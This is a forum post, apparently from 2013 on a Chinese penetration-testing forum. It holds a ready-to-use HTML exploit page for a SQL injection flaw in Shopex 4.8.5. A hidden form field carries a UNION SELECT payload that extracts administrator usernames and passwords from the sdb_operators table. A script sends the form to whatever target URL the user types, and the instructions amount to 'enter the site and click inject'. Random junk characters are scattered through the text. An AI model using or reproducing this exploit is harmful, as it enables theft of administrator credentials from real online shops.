<center>6 T( W, |3 O, V5 n6 @
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
2 d$ r( @: A5 W8 Q" w; y<form action="" method="post" name="submit_url">
, U4 p/ X5 E3 Q, _3 F) p网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>* V. I( {8 L' |" y
<input type="hidden" name="goods[goods_id]" value="3">
3 E5 `; R% I7 e" B9 B4 l% T# I D<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
' R5 A% q0 g/ i% V7 ?<input type="submit" value="给我注入" onclick=fsubmit()>! D2 L* q8 @. N; `) ?0 D
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com7 d- m* N6 X' F2 G l6 K
- O% y1 K" i* N! @6 J<script>
4 }3 }0 S. W8 x4 Ofunction fsubmit(){
1 S" F J9 c: |$ q- L c# W0 N* |! u6 ]' \form = document.forms[0]; ) K& y4 Q' J" ~
form.action = form.url.value+'/?product-gnotify'; : G3 e* t0 I, p: g/ F
form.submit(); 1 ~9 G; U7 L& j
} 5 z5 [! t! o4 j2 c: O
</script>- O$ x# g5 I/ g) H2 B
|
发表于 2013-1-23 09:20:52
收藏
支持
反对